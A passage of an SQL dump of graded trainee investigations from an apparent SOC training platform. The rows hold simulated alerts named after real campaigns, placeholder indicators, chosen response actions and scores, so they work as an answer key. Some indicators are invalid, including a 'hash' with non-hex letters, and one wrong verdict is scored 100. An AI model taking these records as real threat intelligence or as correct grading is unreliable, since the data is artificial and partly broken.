'{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-10 22:18:34', '2026-03-10 22:19:55', 0, NULL),
(498, 225, 1468, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.0.5\",\"hash-d41d8cd9\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/11/2026, 9:20:38 AM\\nALERT: Persistence through Backdoor Installation [OP: Operation Salt Typhoon]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.0.5\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [FILENAME] backdoor_installer.exe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-10T22:20:40.202Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-10 22:19:55', '2026-03-10 22:20:40', 0, NULL),
(499, 225, 1469, 'graded', 93, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/4)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-10.0.5.12\",\"ip-192.168.1.50\",\"hash-d41d8cd9\",\"domain-CORP\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\",\"close_alert\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/11/2026, 9:22:13 AM\\nALERT: Lateral Movement to Wiretap Systems [OP: Operation Salt Typhoon]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 10.0.5.12\\n- [IP] 192.168.1.50\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [DOMAIN] CORP\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Isolate Host\\n- Reset Credentials\\n- Collect Forensics\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-10T22:22:20.030Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/4)\",\"missed_items\":[\"escalate\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-10 22:20:40', '2026-03-10 22:22:20', 0, NULL),
(500, 225, 1470, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.10\",\"ip-203.0.113.45\",\"hash-5d41402a\",\"artifact_3\",\"artifact_5\"],\"selectedActions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"reset_credentials\",\"escalate\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/11/2026, 9:23:22 AM\\nALERT: Exfiltration of Sensitive Communications [OP: Operation Salt Typhoon]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.10\\n- [IP] 203.0.113.45\\n- [HASH] 5d41402abc4b2a76b9719d911017c592\\n- [FILENAME] wiretap_data.zip\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-10T22:23:21.429Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-10 22:22:20', '2026-03-10 22:23:21', 0, NULL),
(501, 225, 629, 'graded', 85, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (1/2)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.12\",\"ip-185.143.223.42\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"close_alert\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/11/2026, 9:24:46 AM\\nALERT: Suspicious Network Connection Detected\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (2)\\n----------------\\n- [IP] 192.168.1.12\\n- [IP] 185.143.223.42\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (5)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Reset Credentials\\n- Collect Forensics\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-10T22:24:49.308Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (1/2)\",\"missed_items\":[\"monitor_traffic\"],\"strengths\":\"Solid analysis\"}', '2026-03-11 01:32:39', '2026-03-10 22:23:39', '2026-03-10 22:24:49', 0, NULL),
(502, 229, 1257, 'graded', 100, 'Verdict is correct (+40). Artifact analysis completed (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.101\",\"ip-192.168.1.102\"],\"selectedActions\":[\"close_alert\"],\"verdict\":\"false_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/10/2026, 4:21:46 PM\\nALERT: False Positive: Normal Network Traffic Misidentified as Anomaly\\nVERDICT: FALSE POSITIVE\\n\\nKEY FINDINGS (2)\\n----------------\\n- [IP] 192.168.1.101\\n- [IP] 192.168.1.102\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (1)\\n------------------------------\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-10T23:21:53.224Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Artifact analysis completed (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-11 02:25:25', '2026-03-10 23:19:25', '2026-03-10 23:21:53', 0, NULL),
(503, 229, 269, 'graded', 93, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/4)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.45\",\"ip-203.0.113.50\",\"hash-d41d8cd9\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"collect_forensics\",\"block_ip\",\"isolate_host\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/10/2026, 6:22:27 PM\\nALERT: BlackEnergy Malware Execution [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.45\\n- [IP] 203.0.113.50\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [FILENAME] invoice.doc\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-11T01:22:29.469Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/4)\",\"missed_items\":[\"block_hash\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-11 01:20:21', '2026-03-11 01:22:29', 0, NULL),
(504, 34, 1466, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-11 02:54:56', '2026-03-11 02:54:56', 0, NULL),
(507, 225, 1461, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-185.123.231.45\",\"ip-192.168.1.25\",\"artifact_2\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/11/2026, 2:20:34 PM\\nALERT: Initial Access: Spear Phishing Campaign [OP: Operation Blockbuster- Sony Pictures]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 185.123.231.45\\n- [IP] 192.168.1.25\\n- [EMAIL] j.smith@sonypictures.com\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-11T03:20:47.507Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-11 06:23:21', '2026-03-11 03:18:21', '2026-03-11 03:20:47', 0, NULL),
(508, 225, 1462, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.0.15\",\"hash-a9f5d8e7\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/11/2026, 2:21:41 PM\\nALERT: Execution: Deployment of Destructive Malware [OP: Operation Blockbuster- Sony Pictures]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.0.15\\n- [HASH] a9f5d8e7b0c8f3a2c1e4d5b6f7g8h9i0\\n- [FILENAME] destructive_payload.dll\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-11T03:21:50.908Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-11 03:20:47', '2026-03-11 03:21:50', 0, NULL);
INSERT INTO `investigations` (`id`, `user_id`, `alert_id`, `status`, `grade`, `feedback`, `executive_summary`, `ai_summary`, `ai_evaluation_scheduled_at`, `created_at`, `updated_at`, `is_reported`, `report_reason`) VALUES
(509, 225, 1463, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-193.168.1.100\",\"ip-10.0.0.25\",\"hash-b6a9b3f8\",\"artifact_3\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/11/2026, 2:22:51 PM\\nALERT: Persistence: Establishing Backdoor Access [OP: Operation Blockbuster- Sony Pictures]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 193.168.1.100\\n- [IP] 10.0.0.25\\n- [HASH] b6a9b3f8a8e4b5c8f9c2d7e58f8a3b6c\\n- [FILENAME] nc.exe\\n- [USERNAME] j.doe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-11T03:23:02.558Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-11 03:21:50', '2026-03-11 03:23:02', 0, NULL),
(510, 225, 1464, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-10.0.45.23\",\"ip-192.168.1.105\",\"hash-f5d5a6b9\",\"artifact_1\",\"artifact_5\",\"artifact_6\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/11/2026, 2:43:37 PM\\nALERT: Lateral Movement: Expanding Reach within the Network [OP: Operation Blockbuster- Sony Pictures]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 10.0.45.23\\n- [IP] 192.168.1.105\\n- [HASH] f5d5a6b9c3b53e4d2a3e1b6f8d7e9c2b\\n- [IP] 203.0.113.45\\n- [FILENAME] malware_payload.dll\\n- [USERNAME] j.doe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-11T03:43:39.524Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-11 03:23:02', '2026-03-11 03:43:39', 0, NULL),
(511, 225, 1465, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.25\",\"ip-45.76.23.17\",\"hash-e3b0c442\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/11/2026, 2:44:50 PM\\nALERT: Exfiltration: Data Theft and Leakage [OP: Operation Blockbuster- Sony Pictures]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.25\\n- [IP] 45.76.23.17\\n- [HASH] e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\n- [FILENAME] confidential_report_2023.pdf\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-11T03:44:56.782Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-11 03:43:39', '2026-03-11 03:44:56', 0, NULL),
(512, 277, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-11 11:47:29', '2026-03-11 11:47:29', 0, NULL),
(513, 277, 1248, 'investigating', NULL, NULL, NULL, NULL, '2026-03-11 14:54:11', '2026-03-11 11:48:11', '2026-03-11 11:48:11', 0, NULL),
(514, 232, 1461, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-185.123.231.45\",\"ip-192.168.1.25\",\"artifact_2\",\"artifact_3\"],\"selectedActions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\",\"reset_credentials\",\"block_ip\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/11/2026, 11:21:37 PM\\nALERT: Initial Access: Spear Phishing Campaign [OP: Operation Blockbuster- Sony Pictures]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 185.123.231.45\\n- [IP] 192.168.1.25\\n- [EMAIL] j.smith@sonypictures.com\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-11T17:51:38.339Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-11 20:56:51', '2026-03-11 17:50:51', '2026-03-11 17:51:38', 0, NULL),
(515, 232, 1462, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.0.15\",\"hash-a9f5d8e7\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"block_ip\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/11/2026, 11:23:40 PM\\nALERT: Execution: Deployment of Destructive Malware [OP: Operation Blockbuster- Sony Pictures]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.0.15\\n- [HASH] a9f5d8e7b0c8f3a2c1e4d5b6f7g8h9i0\\n- [FILENAME] destructive_payload.dll\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-11T17:53:44.421Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-11 17:51:38', '2026-03-11 17:53:44', 0, NULL),
(516, 232, 1463, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-193.168.1.100\",\"ip-10.0.0.25\",\"hash-b6a9b3f8\",\"artifact_3\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/11/2026, 11:25:37 PM\\nALERT: Persistence: Establishing Backdoor Access [OP: Operation Blockbuster- Sony Pictures]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 193.168.1.100\\n- [IP] 10.0.0.25\\n- [HASH] b6a9b3f8a8e4b5c8f9c2d7e58f8a3b6c\\n- [FILENAME] nc.exe\\n- [USERNAME] j.doe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-11T17:55:37.623Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-11 17:53:44', '2026-03-11 17:55:37', 0, NULL),
(517, 232, 1464, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-10.0.45.23\",\"ip-192.168.1.105\",\"hash-f5d5a6b9\",\"artifact_1\",\"artifact_5\",\"artifact_6\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"block_ip\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/11/2026, 11:26:13 PM\\nALERT: Lateral Movement: Expanding Reach within the Network [OP: Operation Blockbuster- Sony Pictures]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 10.0.45.23\\n- [IP] 192.168.1.105\\n- [HASH] f5d5a6b9c3b53e4d2a3e1b6f8d7e9c2b\\n- [IP] 203.0.113.45\\n- [FILENAME] malware_payload.dll\\n- [USERNAME] j.doe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-11T17:56:13.586Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-11 17:55:37', '2026-03-11 17:56:13', 0, NULL),
(518, 232, 1465, 'graded', 82, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/5)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.25\",\"ip-45.76.23.17\",\"hash-e3b0c442\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"block_hash\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/11/2026, 11:27:43 PM\\nALERT: Exfiltration: Data Theft and Leakage [OP: Operation Blockbuster- Sony Pictures]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.25\\n- [IP] 45.76.23.17\\n- [HASH] e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\n- [FILENAME] confidential_report_2023.pdf\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (3)\\n------------------------------\\n- Block File Hash\\n- Reset Credentials\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-11T17:57:53.895Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/5)\",\"missed_items\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-11 17:56:13', '2026-03-11 17:57:53', 0, NULL),
(519, 282, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-11 23:46:37', '2026-03-11 23:46:37', 0, NULL),
(520, 283, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-11 23:58:53', '2026-03-11 23:58:53', 0, NULL),
(521, 283, 233, 'graded', 100, 'Legacy investigation (V1) complete. Transitioning to Playbook System (V2).', '{\"verdict\":\"True Positive\",\"executive_summary\":\"The log shows that the email came from the address noreply@secure-bank.com , and the link leads to the same domain http://secure-bank.com/login . At first glance, it looks consistent. However, there are two critical signs of phishing: The link uses HTTP instead of secure HTTPS — real banks never use an unencrypted connection for login pages. The sender\'s IP address 198.51.100.22 belongs to the test range, which should not be used in real mail. These signs indicate that the attackers are imitating the bank in order to steal the credentials of the target_user user.\",\"artifacts\":\"198.51.100.22, http://secure-bank.com/login\",\"analysis_answers\":{\"action_taken\":\"The log shows that the email came from the address noreply@secure-bank.com , and the link leads to the same domain http://secure-bank.com/login . At first glance, it looks consistent. However, there are two critical signs of phishing: The link uses HTTP instead of secure HTTPS — real banks never use an unencrypted connection for login pages. The sender\'s IP address 198.51.100.22 belongs to the test range, which should not be used in real mail. These signs indicate that the attackers are imitating the bank in order to steal the credentials of the target_user user.\",\"conclusion\":\"\"},\"submitted_at\":\"2026-03-12T12:07:05.549Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', '2026-03-12 03:14:35', '2026-03-12 00:09:35', '2026-03-12 12:08:00', 0, NULL),
(522, 285, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-12 07:27:36', '2026-03-12 07:27:36', 0, NULL),
(523, 281, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-12 09:53:38', '2026-03-12 09:53:38', 0, NULL),
(524, 289, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-12 10:05:59', '2026-03-12 10:05:59', 0, NULL),
(525, 42, 233, 'graded', 100, 'Legacy investigation (V1) complete. Transitioning to Playbook System (V2).', '{\"verdict\":\"False Positive\",\"executive_summary\":\"It seems like a false positive alert, as it has been sent from the bank.\",\"artifacts\":\"http://secure-bank.com/login\",\"analysis_answers\":{\"action_taken\":\"It seems like a false positive alert, as it has been sent from the bank.\",\"conclusion\":\"\"},\"submitted_at\":\"2026-03-12T11:46:50.416Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', '2026-03-12 14:51:05', '2026-03-12 11:41:05', '2026-03-12 11:48:00', 0, NULL),
(526, 42, 234, 'investigating', NULL, NULL, NULL, NULL, '2026-03-12 14:57:08', '2026-03-12 11:48:08', '2026-03-12 11:48:08', 0, NULL),
